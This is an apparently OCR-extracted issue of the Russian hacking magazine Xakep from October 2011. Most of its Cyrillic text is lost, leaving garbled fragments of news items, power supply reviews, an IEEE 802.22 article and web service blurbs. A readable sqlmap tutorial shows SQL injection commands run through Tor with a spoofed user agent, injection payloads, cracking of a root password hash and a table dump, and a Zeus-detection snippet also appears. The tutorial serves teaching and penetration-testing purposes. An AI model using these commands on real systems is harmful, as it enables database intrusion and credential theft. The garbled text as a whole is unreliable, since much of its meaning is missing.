
SQLMAP: SQL-

028

x 10 (153) 2011

802.22:

WWW.XAKEP.RU

10 (153) 2011

: 210 .

DEFCON:
034

3D- $30
058

MICROSOFT

066

DEFCON

052

153

DEFCON CTF 2011


.
,
.

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

MALWARE SYN/ACK
UNIXOID PSYCHO

PHREAKING
PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

Step (step@real.xakep.ru)
Ant (antitster@gmail.com)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

Intro

: 24
, 100% !
:
, , .
,
.
: ?.
: 4 -
.

. ,
:
- .
, .
, , ,
. :
-, xakep.ru, ,
.
DEFCON 19
,
CTF. ,

, whitehat-, .
nikitozz, . .
vkontakte.ru/xakep_mag

10 /153/ 2011


.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)

(birarova@glc.ru)
( )
(tatarenkova@glc.ru)

(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011

001

Content

MEGANEWS
004
011


hacker tweets
-

MALWARE
078
082

FERRUM
016
020

!
80 PLUS Gold

WEXLER.BOOK T5002

088
094

PCZONE
022
027
028

032
033
034

802.22: White Space



WWW2
web-
Sqlmap, SQL-

SQL-
Proof-of-Concept
Linux


3D- $30
3D-

PHREAKING

098
100
104
109

042
046
052
058
062
066
070

076

Easy-Hack



DEFCON CTF
-


-

?
8

local/remote file include

X-Tools



IRP-

kernel- Mac OS X
JavaScript
Node.js

UNIXOID
112
118



300

,
-
Virus Free Man

122
038


SPYEYE

?

,
,

MegaFAQ Android OS
3.0
Linux kernel 3.0:

SYN/ACK
128

132
136





Linux
Drupal
.

140
143

FAQ UNITED
FAQ

8,5


MEGANEWS
TOPIARY . ?
, , LULZSEC

6452
,
The 077 (Hamdi Hacker).

.



- !
,
: , , ,
- .
: ,
, .
!
Cobra Tag, Bluetooth GPS,
Cobra Tag, , .
, , .
,
, .
: , ,
,
. ,
. -
. , 60 !


,

Topiary.



-

LulzSec , . ,
, . 27
18- , ,
, - Twitter
Topiary. .
? . , DdoS- .
, ,
750 000 , NHS,
.
. , LulzSec Exposed , LulzSec.
, (pastebin.com/kfi3Ticq) ,
Topiary ,
, . ? ,
. ,
.

BLACK HAT 2011


:
Anonymous LulzSec
?.
36 % ,
, 64 % ,
.


-
Amazon EC2
(Reddit, Netflix . .)
30 .
, -
Amazon !
.


Twitter
1 , .
6,4%

.

30 MSDOS
Microsoft. 30
, 12
1981 ., IBM PC 5150.

PAYPAL

!

! .


>> coding

MEGANEWS

TWITTER . Twitpic.com .

METASPLOIT
HD MOOR




- (
).
, ,
,
. ,
, . , ,
, ,
.

.
, ,
.
. , .

, -
.
,
.
, :
27 % .
-.

Rapid7
Metasploit Framework 4.0. , , 3.0 2007 .! ,
.
Metasploit ,
. ,
200 ,
.
.
, Metasploit Framework 4.0
3.x-.
DEP ASLR. msfgui GTK Java,
ASCII-. ,
, , Rapid7 , Metasploit 4.0
, .
,
.

GOOGLE MOTOROLA
( ) 12,5
.
Motorola Mobility
,
Android.
2011 2012
. Motorola
Google.


716
361
68


Metasploit.
Metasploit
BSD

-
FIREFOX 7
Android.

2050% ,
.

/4
Windows XP,
Avast. 74%
.


MEGANEWS

83% GOOGLE+ , Bime Analytics.

SAMSUNG GALAXY XCOVER


, ,


, ,

. , ,

Ericsson R310s
. Siemens ME45...
,
, , : ,
. , , , ,
. , ,
. . Samsung , Android Galaxy Xcover (GT-S5690)
. IP67,
,
1
. , Xcover
, Samsung
.
Galaxy Xcover Android 2.3
Gingerbread .
, 135 , 12 .
3,65 ,
, 45 . Galaxy Xcover
800 , 150 -,
microSD, Wi-Fi 802.11n
Bluetooth 3.0, GPS HSPDA.
3 , ( ), FM-, USB 2.0, 3,5- 1500 .
, Galaxy Xcover
, - .
, . ,
2800 , 12,7 . .
, Android . Motorola Defy Sony
Ericsson Xperia Active.

Samsung Galaxy Xcover Samsung Social Hub,


,

XP



WINDOWS XP

50%
49,69%

-

.
, !

Abuse-
( ).


( $5000).

DDoS
( ).


( ).

.

.

Double VPN-

( ).


SMS .


,
.

socks-
( ).


MEGANEWS

ANDROID-

GPRS

,
. ,
(
) GSM-,
,

15 .
Security
Research Labs
GPRS. , GPRS
-
. , T-Mobile, O2 Germany, Vodafone,
GPRS.
GPRS ,
, , ,
. , , 128
. , , ,
,
,

. ,
.
. Chaos Communication
Camp 2011, ,
GPRS, GPRS-,
.
:
,
GPRS
. ,
5 !
,
GPRS,
, .
. ,

. Chaos
Communication Camp ,
. , ,
.

70%
,

,
,

2011 .


.

Android OS

,
Android, CA Technologies.
, , . ,
, , ,
ARM, shangzhou/callrecord
(SDCard). , . , ,
, , . CA Technologies,
. , :
,
,
. , , ,
.


#hacker tweets
. . , . ,
(@asintsov) .

@ChrisJohnRiley:
@google,
,
,
... G+ ,
!

@SecurityHumor:
Google+ CAPTCHA:
, .
,
, ,
" ".

@0xcharlie:
.

!
15% . RSA , ...
:

RSA. ,
.

@nickdepetrillo:
, ,


.

@VUPEN:
Java 7 . ASLR, , ASLR Java
ROP . Oracle/Sun!


@taviso:
Adobe 400 ,
APSB11-21

. .
: 400! .
, , 50 %
, . , , bit.ly/qjJzZD.

@stephantsov:
! ! ,
IV! ,
#defcon!
:
, ( ,
Defcon CTF
). , !

@pentestit:
SSL- ! http://bit.ly/o8jSrT.
@todb:

, - ,
.

:
,
! .

@str0ke:

packetstormsecurity.com +
exploit-db.com + FD + Daily
@xme:
...
! !

@kevinmitnick:
!!!
: , ,
,
, ,
! .

@frbbs:
J 50 .
, ,
,
Nessus CISSP . http://t.co/PehrnZn.

Dave + metasploit's changelog


.
:
, (@str0ke) .
, , .

@41414141:
! Cisco
TelePresence [...]
root [ ],
.
http://t.co/xjW27eW.

@0xcharlie:
! 010 Editor
Mac OS X.
!


MEGANEWS

22 APPLE , Apple Store.

EDIFIER C5

2.1 2.1+

Edifier
,
C5.
2.1 2.1+
( ). 8-
c 3.5- 3/4-
.

FM-, USB- SD-.
, MP3, WMA
& PCM
.
:
: RMS 9W x 2 + 35W x 1 (THD=10%)
-: 85 (A)
: 0.5%
: 10 Ohm
: 8 (210 ), , 4 .
: 3.5 (92 ), , 4 .
: 13 , , , 4 .
: 35 .

, , . AntiSec ,
.
77 -,
, ,
. ,
. ,
10
,
7000 .
, , ,
,
. ,
.
, ,
( ,
). , ,
14 ,
,
PayPal. ,
.


MOZILLA.
Mozilla
,

Boot
to Gecko.
Gecko,
Mozilla:
Firefox Thunderbolt.
Boot to Gecko
-,

HTML5.


-
Pastebin

BART (Bay
Area Rapid Transit).
,
100
.
, ,
Anonymous

3

Google,
400 .

,

,
Facebook, Twitter
MySpace, Sophos.


MEGANEWS

FACEBOOK

IPAD 3 , DigiTimes.


?


. ()
()
arxiv.org/abs/1107.2031
, , , ,
. ,

. Stegobot, ,
( ,
), .
,
, Stegobot ,
- , ! ,
Facebook JPEG- 720720
( Facebook )
50
. ,
Stegobot, .
Facebook , .

Stegobot
Flickr. 7200 ,
.

. .
, . ,
,
.

Facebook

,
...

,
Facebook .
, . , Security Bug Bounty.
, , ,
. ? .
500 , Facebook
.
, , , . Facebook .
, XSS-, CSRF/XSRF,
. ,
,
Facebook, , .
, Facebook
. , .
, Mozilla 3
. , Google 3133,7. , , 300 000 . -
.

40%
50 000 USB, 20%
100 000 .

2,5 !

(facebook)


MEGANEWS

DEFCON CTF. . 52

DEFCON 19

GOOGLE APPLE/MICROSOFT

-

- DEFCON. ,
, , ,
.
.
?
,
(whitehat)
Capture The Flag. ,
DefCon
Kids, 8 16 ,
, .
, Google .
. , defcon.org. . ,
HBGary, ,
HBGary, ,
.
Whoever fights
monsters: confronting Aaron Barr, Anonymous and ourselves
LulzSec, Anonymous,
.

,
Android
.
Microsoft
Samsung Barnes & Noble, Apple HTC Motorola
.
( , -,
), Google
. Google , Microsoft, Apple Oracle
Android ,

. , ,
Android, . , Google

Android .
, Google
Android. ,
, Apple
Samsung Galaxy Tab
10.1 (,
).



Adobe, Flash

, -
-
, HTML5,
CSS3 JavaScript. Adobe
Edge , ,

Adobe Labs.


1000



Google
IBM,

.

,


-
Samsung.
Cyanogen
CyanogenMod.

Apple
,
,
2011 .
Steve
Jobs: A Biography.


MEGANEWS

ANDROID 2.3 (GingerMaster) Android Marketplace.


,

BlackHat
Wireless Aerial
Surveillance Platform ( ). , , ,
WiFi-.
-23, Via Epia Pico ITX
PC (500 Via C7, 1 RAM Backtrack 4 ) ArduPilot.
PPP-over-SSH. .
,
14 (6,35 ) 6 (183 ). Via Epia PX5000EG Pico
ITX PC (500 Via C7, 1 RAM), Linux BackTrack 5.

340 . WASP , WiFi-.
4G-, , ,
Google Earth
. , ,
VPN ,
.
GSM-. GSM-
4G VoIP. ,
. SMS
, 32 .
,
15 .
400 (122 ), , ,
20 000 (6096 ).
-: . ,
, , ,
.
- rabbit-hole.org.
, , Black Hat 2011
DEFCON 19, , . , ,
. ,
.

,
1300 .
, : 6190

XSOUND WINSTON XS
WinstonXS XSoundBar openair-
Winston Global Gathering Freedom Music,
16 2011
-. 30 000
,
.
XSoundBar
. ,


, chillout-,
3D-mapping,
DVJ.
Winston Global Gathering
Freedom Music XSound
.
XSound

,
www.winstonxs.ru.

FERRUM

!

80 PLUS GOLD

? , , , ,
? , . , .
.
, ,
SLI CrossFireX. : .



D-RAM DBS-2200 FSP. ,
,
, ,

.
850 .
.
+12V
, 100 .

+3,3V +5V 20 .


, .
+12V 200
. .
:
+3,3V, +5V, +12V.
, : ,
. : ,
,
.


:
Cooler Master Silent Pro Gold 700W
Corsair Professional Series Gold AX750
ENERMAX MODU87+ 800W
FSP AURUM GOLD 600
FSP AURUM GOLD 700
Thermaltake Toughpower Grand 750W


COOLER MASTER SILENT


PRO GOLD 700W
Silent Pro Gold 700W
Cooler Master.
80 PLUS.
20+4- ,
4+4- 6- .
,
, - , , .
Silent Pro Gold 700W 700 , +12V 56 (672 ).
120 . Silent Pro Gold 700W .
+3,3V
1%, +12V +5V 2%. ,
, ,
. , .

5200

5000

CORSAIR PROFESSIONAL
SERIES GOLD AX750
Professional Series Gold AX750
, .
,
: , . AX750 (
), , .
(SATA Molex) ,
Cooler Master.
-
. AX750
750 62 (744 )
+12V. 120 .
AX750 .
2 % .
AX750 ,
20%, 20 50%
100% ,
.


,
20%

FERRUM

ENERMAX MODU87+ 800W


MODU87+ 800W ENERMAX.
. , , .
: , ,
, , ,
CordGuard,
, . MODU87+
800W 4 +12V, 30 ,
792 . .
: 12%, . +12V,
. 140 ,
. ,
- ,
.

7900
.

FSP AURUM GOLD 600


,
.
: , , , FSP. :
150 , . FSP AURUM GOLD 600,
, 600 , 90 %,
80 PLUS Gold. 4
+12V 18 .

. , , , +5V,
4%. .
, , .
. ,
.

3100
.

Cooler Master
Silent Pro Gold
700W

Corsair Professional
Series Gold AX750

700
90 %

+3,3V-22 , +5V-25 , +12V- 56 ,
-12V- 0,3 , +5Vsb -3,5
+3,3V & +5V-150 , +12V- 672

750
90 %

+3,3V -25 , +5V-25 , +12V-62 ,
-12V -0,5 , +5Vsb -3
+3,3V & +5V -125 , +12V -744

PFC

120
160 x 150 x 86
3,3

120
160 x 150 x 86
3,3

:
:
+12V


ENERMAX
MODU87+ 800W

800
93 %
4
+3,3V-24,+5V-24,+12V1-V4-30,
-12V-0,5,+5Vsb-3
+3,3V & +5V - 120 , +12V1
& +12V4 -792

140
175 x 150 x 86
2,9


FSP AURUM GOLD 700


AURUM GOLD 700 FSP
,
, , .
- , ( ),
- . AURUM GOLD 700

6+2 pin, SATA Molex,


FDD. 700 , +12V
, , 18 , +3,3V +5V
28 . 120 . AURUM GOLD 700 ,
, .
3% . :
. ,
: - .

3700
.

THERMALTAKE
TOUGHPOWER GRAND 750W
Thermaltake Toughpower Grand 750W
, ,
. 180 ! Toughpower Grand 750W, ,
: , ;
; ; , - , 4 ,
, , .
Toughpower Grand 750W . 750 , +12V 720 .
140- ,
. ,
: Toughpower Grand 750W , ,
. , 2 %
, +5V .

5300
.

FSP AURUM
GOLD 600

600
90 %
4
+3,3V-24,+5V-24,+12V1-V4-18,
-12V-0,5,+5Vsb-3,5
+3,3V & +5V -140 , +12V1
& +12V4 - 540

120
150 x 140 x 86
1,9


FSP AURUM
GOLD 700

700
90 %
4
+3,3V-28,+5V-28,+12V1V4-18,
-12V-0,5,+5Vsb-3,5
+3,3V & +5V -160 , +12V1
& +12V4 - 672

120
150 x 140 x 86
1,9

Thermaltake
Toughpower
Grand 750W

750
92 %

+3,3V-25,+5V-25,+12V-60,
-12V-0,8,+5Vsb-3
+3,3V & +5V - 150 ,
+12V -720

140
180 x 150 x 86
2,5


ENERMAX
MODU87+ 800W. , ,
,
. , , , .
, ,
. ,
80 PLUS Gold,
FSP FSP AURUM GOLD 700. ,
700 , , . z


FERRUM


WEXLER.BOOK T5002

2500
.

:
: 5 , 800 480 ,
, , LED-
: 4
: 32 microSD
: TXT, PDB, HTML,
PDF, FB2, EPUB
: MP3, WMA, FLAC, AAC
: JPEG, BMP, GIF
: WMV, RM, AVI, RMVB,
3GP, FLV, MP4, DAT, VOB, MPG, MPEG,
MKV, MOV
: USB 2.0, audio-out
: FM-, ,

: 148 90 11
: 285
: ,
mini-USB > USB,


,
, . -
-
. :
, , FM-,

.
WEXLER.BOOK T5002, .
W

WEXLER

.
.
.
, .

WEXLER.BOOK T5002 ,

e-ink:


. :


,
. FM-

.
MP3,
FLAC ACC. , (4 ),
microSD.

:

, -
.
WEXLER.BOOK T5002
,
.
,

, .
: mini-USB
.


,
.
, -
. ,
-, , ,
. ,
, ,
,
.

WEXLER.BOOK T5002 ,

. ,
-, . , ,
.
WiFi - . ,
,
,
e-ink, LCD-
.

, WEXLER.
BOOK T5002 .

.
.
.


Preview

31 .
.

58


,
, IT-
,

?
Waledac, Rustock, CoreFlood

- ,

Microsoft. ,

, ,
.


,
.

PC ZONE

34

3D- $30
, -
3D- ?
.

MALWARE

82



?

, .


66



Windows
. 8
.

94



IT-. ESET

.

70


local/
remote file include .
,
.

UNIXOID

118

ANDROID:
, , ,
,

MegaFAQ'.


PC ZONE

TGX (korikov_sibsuti@mail.ru)

802.22:
White Space



,
Wi Fi, WiMAX LTE?
,
100
22 /.


WWW

IEEE 802.22


802.22: www.ieee802.
org/22.

2011 . (Institute of Electrical and Electronics Engineers)


IEEE
802.22, white space ().
: /- (54862 ) .
,
,
. ?
,
, .
,
( GPS), ,
.
.

INFO


IEEE
802.22 WG
Carlos Cordeiro,
Kiran Challapali
and Dagnachew
Birru IEEE 802.22:
An Introduction to
the First Wireless
Standard based on
Cognitive Radios.


, IEEE 802.22 WRAN , . ,



.
22 / 100 !



(Wireless Regional Area Network, WRAN). .
-
, .
, Wi-Fi, WiMax LTE . .


54 862 , .
,
6 ,
8 , 7- , ,
. 802.22
6 (8,7) .


. .
/ :
( ) .

NTSC (, , ), PAL (), SECAM (, ,
) (, . .)
( . .).
, ATSC/DVB-T
, !

(coexistence) , ,
.

, ( ) ().
.
,
30 4 .
,
.
.
.
(
, ). ,
(sensing) .
GPS-.
IEEE 802.22 , IEEE 802.16 (WiMax), . , 802.22 . .
, 802.22 ,

.



IEEE 802.22 , .
, PHY- (Physical) MAC- (Media Access
Control) OSI , .



,
.
(sensing) .
.
.
,
,
.
.

.

.

, ,
.

.
GPS-.
NMEA
0183. ,
GPS.





(Time Division Duplexing, TDD).


802.22
III, 1999 . . , cognitive radio ( ),

. ,
. . 2004 .
(Federal Communications Commission)
,
,
. 2004 . IEEE ,
802.22
.
IEEE 802.22 2011 .


PC ZONE

[Figure: 802.22 superframe and frame structure; labels: SCH, FCH, DC map, US map, CBP, USC, frames N and N+1]

[Figure: wireless network classes; labels: WPAN (Wireless Personal Area Network) 10, WLAN (Wireless Local Area Network) 150, WMAN (Wireless Metropolitan Area Networks) 5, WWAN (Wireless Wide Area Network) 15, WRAN (Wireless Regional Area Network) 100]

1 GP=GPS
GL=
2

3 A , V
4
5 N=, S=
6
7 W=, E=
8

9
10
11
12
13 :
A =
D =
E =
N =
14
15 <CR> = 0x0D <LF> = 0X0A

QPSK

16-QAM

64-QAM

NMEA 0183
( , ) .
GPS-,
1

10

11

12

13

14

15

$GPRMC,hhmmss.ss,A,GGMM.MM,P,gggmm.mm,J,v.v,bb,ddmmyy,x.x,n,m*hh<CR><LF>


( )

RMC-



,
. ,

.
802.22 -
(Orthogonal Frequency Division Multiplexing, OFDM).
WiMax. , .
.
: (Quadrature Phase Shift Key, QPSK),
16 64 (Quadrature
Amplitude Modulation, 16 QAM 64 QAM). , . . , (
).
, , 16 QAM
, QPSK.
,
.
OFDM
. - .
.
,
,
. OFDM ,
.
802.22 , .
(Gallager),

.

-
(Orthogonal Frequency Division Multiple Access, OFDMA).
, . OFDMA , WiMax LTE. OFDM
.
0,624 3,12 //.
. ,
,
.

(channel bonding). ,
18 (21, 24)
.

, .

. /-
(
) . ,
IEEE 802.22 , .

, .
802.22
(superframe). 160 .
(preamble) (superframe
control header, SCH).
.
, , . ,
SCH
. (frame). 10 ,
16 .
.
802.22 ,
. ,
. ,

. SCH
. SCH ,
. ,
.
.
,

. ,
,
, , .
, .

. .
,
. ,
. .

MAC-
(Media Access Control) . MAC,
,


:
.
: ,
.
:
114 /.
: (Point-to-Multipoint).
: 10100 (
).
: 4 (
, EIRP).
: (
) ,
; ,
( ).
: GPS ( ).


Wi-Fi
802.11n

UMTS (3GSM)

WiMax

LTE

802.22

UMTS/W-CDMA

802.16d

LTE

802.22

802.11g

Wi-Fi
.

. 802.11
. Wi-Fi
Wireless Fidelity (
).


,
3G. UMTS

Universal Mobile Telecommunication System.

, 3.9G. WiMax

.

Worldwide Interoperability
for Microwave Access
( ).



CDMA-UMTS-.


UMTS-. LTE
3.9G-.
LTE Long Term
Evolution ( ).

802.22
,



.



.

Wi-Fi-
.


.


.

UMTS

3G-.

UMTS,
: HSPA, HSPA+,
HSDPA. 3.5G-.

WiMax
Wi-Fi,
(WMAN).

DSL-.
,
,
Wi-Fi.

LTE .
().
(Yota)


LTE
.

,

.

(
)

38140

46

5100

30100

2,4

2,4 5

18852025
21102200

211

7004000

54862

Ma

54 /

600 /

2 /c

75 /

173 /

23 /

20

2040

1,2520

1,420

624

TDD

TDD

FDD

FDD/TDD

FDD/TDD

TDD

CSMA/CA

OFDMA

W-CDMA

OFDMA

OFDMA/SC-FDMA

OFDMA

MIMO

2003

2009

2001

2004

2009

2011

70250

?
IEEE 802.22, ,
,
. ,
, 802.22
.
,


,
. , ,

.
, ,
,
. . z


PC ZONE

WWW2
ENCIPHER.IT
encipher.it

( , ) : : Gmail, Facebook .
? ,
JavaScript, AES 256.
,
. ,
, , Gmail. , .
, ,
.

BTDIGG
BTDigg.org

-,
. BTDigg BitTorrent, . DHT-! ,
BitTorrent- . , -, ()
. . magnet-, 160- . BTDigg
DHT- -,
-. : @name (
), @content ( ).

IDEONE
ideone.com

DHT

,
ideone, . , 40 . ,
. /C++, Java, C#,
Assembler, Objective C, ( Python) .
: 10 , 15 ( , 5) , 256 . ,
. API,
.

TAGBEEP
tagbeep.com

- , . tagBeep. - . TagBeep , . ,
, , .
, , (, 10 ). TagBeep
,
( , ). SMS-,
, , .


PC ZONE

(miroslav.stampar@gmail.com)

Sqlmap,
SQL-




SQL-
INFO
.
(@stamparm), , (@inquisb), ,
. 2006 .
(@belch), - , 2009 . .

, sqlmap?
,
SQL-
. sqlmap
SQL-,
. , sqlmap
, .
,
:
,
( ). . ,
(
DBMS), ()
. -
SQL-.


SQLMAP?

UNION query SQL injection


SQL-,
sqlmap:
UNION query SQL injection.
SQL-, ,
UNION ALL SELECT. ,
-
SELECT : for ,
. Sqlmap ,
(Partial UNION query SQL injection).
Error-based SQL injection.

, HTTP- ( ) DBMS,
-
. , - - (
) DBMS.
Stacked queries SQL injection. ,
- , , , HTTP- (;)


Boolean-based blind SQL injection

SQL-.
SQL-, SELECT, ( INSERT DELETE). ,
/
, .
, -
, .
Boolean-based blind SQL injection.
: .
. Sqlmap HTTP ,
SELECT (
).
HTTP- headers/body
,

SQL-.

true- ( ).
, sqlmap ,
HTTP. ,
,
( unicode).
Time-based blind SQL injection. .
,
. , DBMS
(, SLEEP() BENCHMARK()). ,
,

SQL-: ?
SQL- , -,
SQL-
(, $query="SELECT * FROM users WHERE id=".$_REQUEST["id"]).
SQL- ,
. fingerprinting ,
(
users). , , ,
- - (,
).


.
. , ,
- .

,
. SQL-
, ][ SQL Injection: (bit.ly/pBSNVA).
, DBMS
. sqlmap
MySQL, Oracle, PostgreSQL, Microsoft
SQL Server, Microsoft Access, SQLite, Firebird, Sybase SAP MaxDB.

SQLMAP
SQL- ,
- sqlmap.
, ,
. , sqlmap :
, , .
.
, .
.
, (
), (users)
(pass).
, , ,
- MySQL, MySQL,
PostgreSQL Microsoft SQL Server.
,
, .
( SQL-)
DBMS,
IP-, .
TCP- ( out-of-band) ,
.
(), Meterpreter
VNC-.

getsystem Metasploit, , , kitrap0d (MS10-015).
:
, . !


PC ZONE

. ,
sqlmap. ,
, OWASP (www.owasp.org),
. ,
sqlmap Python, ,
.
. ,
LAMP (Linux/Apache/MySQL/PHP)
-.
1
, ,
GET- id -,
http://www.site.com/vuln.php?id=1 ( URL -u).
,
( --random-agent), TOR- (--tor). , sqlmap:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor
sqlmap/1.0-dev (r4365) automatic SQL injection and database takeover tool

17 HTTP(S)-. , , .
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind WHERE or HAVING clause
Payload: id=1 AND 1826=1826
Type: error-based
Title: MySQL >= 5.0 AND error-based WHERE or HAVING clause
Payload: id=1 AND (SELECT 8532 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,116,120,58),(SELECT (CASE WHEN (8532=8532) THEN 1 ELSE 0 END)),CHAR(58,98,121,102,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) 3 columns
Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,98,116,120,58),IFNULL(CAST(CHAR(74,76,73,112,111,113,103,118,80,84) AS CHAR),CHAR(32)),CHAR(58,98,121,102,58))
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(10)


, -
SQL-, , SQL-. , PHP

$query="SELECT name, description, comment FROM catalogs WHERE
catid=".$_GET["catid"]. , GET catid
SQL . , URL
http://www.site.com/vuln.php?page=front&catid=-1
UNION ALL SELECT database(),current_user(),version()&uid=0,
,
.

, , , -:
[02:01:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
:
[02:01:45] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/www.site.com'
2
. ,
fingerprinting (-f)
(--banner) , , ,
(--current-user). , (--passwords) (--tables),
, (--exclude-sysdbs)
. , :
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor -f --banner --current-user --passwords --tables --exclude-sysdbs
,
:
[02:08:27] [INFO] fetching banner
[02:08:27] [INFO] actively fingerprinting MySQL
[02:08:27] [INFO] executing MySQL comment injection fingerprint

Error-based SQL injection


web application technology: PHP 5.2.6, Apache 2.2.9


back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
comment injection fingerprint: MySQL 5.1.41
banner parsing fingerprint: MySQL 5.1.41
banner: '5.1.41-3~bpo50+1'
:
[02:08:28] [INFO] fetching current user
current user: 'root@localhost'
- :
[02:08:28] [INFO] fetching database users password hashes
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[02:08:30] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[02:08:32] [INFO] using default dictionary
[02:08:32] [INFO] loading dictionary from '/opt/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] N
[02:08:33] [INFO] starting dictionary-based cracking (mysql_passwd)
[02:08:35] [INFO] cracked password 'testpass' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *6B2C58EABD91C1776DA223B088B601604F898847
[*] root [1]:
password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
clear-text password: testpass
! root (
). :
[02:08:35] [INFO] fetching database names
[02:08:35] [INFO] fetching tables for databases: information_schema, mysql, owasp10, testdb
[02:08:35] [INFO] skipping system databases: information_schema, mysql
Database: owasp10
[3 tables]

?
SQL-
SQL-.
, PHP PEARs DB
(pear.php.net/package/DB),
SQL-.
: $p = $db->prepare("SELECT * FROM users WHERE id = ?"); $db->execute($p, array($_GET['id'])). , ,
SQL- ,
SQL- (
). , ,
(, intval()) , mysql_real_escape_string() addslashes(),
. ,
, , .


+--------------+
| accounts     |
| blogs_table  |
| hitlog       |
+--------------+
Database: testdb
[1 table]
+-------------+
| users       |
+-------------+
[02:08:35] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/www.site.com'
!
3
, testdb- (-D testdb) users (-T users), , ,
(--dump).
, , SQLite
(--replicate).
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor --dump -D testdb -T users --replicate

users :
[02:11:26] [INFO] fetching columns for table 'users' on database 'testdb'
[02:11:26] [INFO] fetching entries for table 'users' on database 'testdb'
Database: testdb
Table: users
[4 entries]
+----+--------+------------+
| id | name   | surname    |
+----+--------+------------+
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 1  | luther | blissett   |
| 4  | NULL   | nameisnull |
+----+--------+------------+
[02:11:27] [INFO] Table 'testdb.users' dumped to sqlite3 file
testdb.
sqlite3 SQLite. ,
,
, SQLite (, SQLite Manager).

Proof-of-concept
DSSS, Python-,
SQL-. , , ,
100 . ,
SQL- .
.
sqlmap,
,
SQL-,
. z


PC ZONE

Proof-of-Concept
LINUX

, , . bellard.org/jslinux,
, Linux-,
, . ,

. , PC, JavaScript
! TinyCC. !
? ,
. JavaScript PC Emulator (
)
QEMU. ,
. PoC .


? ?
Unix-
.
JS/UIX (www.masswerk.at/jsuix),

Unix-.

JavaScript . , JS-

Linux.

?
,
(QEMU).
JavaScript PC Emulator , . , ,
, ,
.
JavaScript, JS-. , Jaeger Monkey,
Firefox 4, V8 (Chrome).
, ,
Jaeger Monkey
( -. .
).

JavaScript PC Emulator Firefox


,
, x86. (
, , ), .
: CPU c RISC- (-
MIPS ARM),
x86 .

, Linux.
,

( Firefox Chrome).
,
,
.
. z


PC ZONE

(twitter.com/stepah)


. , . -,

.
: , ,
,
.
PCAP-.

, ,
. , ,
.
Joe Sandbox Web (www.joesecurity.org) ,
-,
, .

, .
PE- , winsocket-
, , ,
, ,
.
. .
, ,

. : -,


,
, sleep (
2 ), . Joe
Sandbox Web 160 .
.
,
Python- .
Zeus,

:
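import re

zeusfiles = ["c:\\windows\\system32\\ntos.exe",
             # [... ...]
             "c:\\windows\\system32\\lowsec\\user.ds"]
zeusdetected = False  # set once one of the known Zeus files has been created
zeusservers = []      # destination IPs of requests that look like C&C traffic

def sigmatch(data):
    global zeusdetected
    if data["func"] == "fileCreated":
        if data["status"].find("success") != -1:
            # The file was created successfully: compare its path with the known Zeus file names
            for zeusfile in zeusfiles:
                if data["path"].lower() == zeusfile:
                    zeusdetected = True
    elif data["func"] == "http":
        if zeusdetected:
            # Record the destination IP of a POST to gate.php as a C&C server
            if re.match(r"POST.*gate\.php", data["request"], re.I):
                zeusservers.append(data["dstip"])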
Joe Sandbox Web
. -
AutoIt-, ,
. ( ,
, ).
:
. ,

. .
,
, , .
: ,
. Joe Sandbox Web.
, .

. , . z


PC ZONE

3D-
$30


3D-

3D-,

,

,
.
, -.
.

WWW
www.davidlaserscanner.
com
.
!

,
,
,

.

3D-
.
3D- ( 3D)
,
, , , , . , ,
: ,
. . ,
-,
, .
, -
-,
. .
, .
,
. ,
,
- . ? , , 3D-! :
. , !
( ), ,
3D- . ,
. ,
. , ,
. ,
3D- . , , .



?
3D-, ,
:
, , -,
.

,
, ,
. , , ,
/
: -
. DAVID-laserscanner (www.david-laserscanner.com) TriAngles
(www.intricad.com), ,
.
:
, .
.
, .
DAVID-laserscanner ,
.
199 229 ,
. . , . ,
, DAVID,
, ,
. .

-
,
,
-.
, , .
,
. ,
640 480.
:
(
),
,
.
USB- WDM- (. ., ,
DAVID). - ,
DAVID ,
. Logitech
WebCam Pro 9000 with cam holder,
. Logitech 270 35 .



, .
, . !
,
,
. ,
,
. .
,
. , ,
. ,
( ).

. 650
5 , 25 .
, ,
(, www.greenlaser.com.ua). ( 20 ) ,
. , .
,
, /.
9 : +, - : ,
, , .

.
,

,
. ,
,

,
90. DAVID
PDF CDR , Calibpoints_Scale30_DIN_A4.pdf. ,
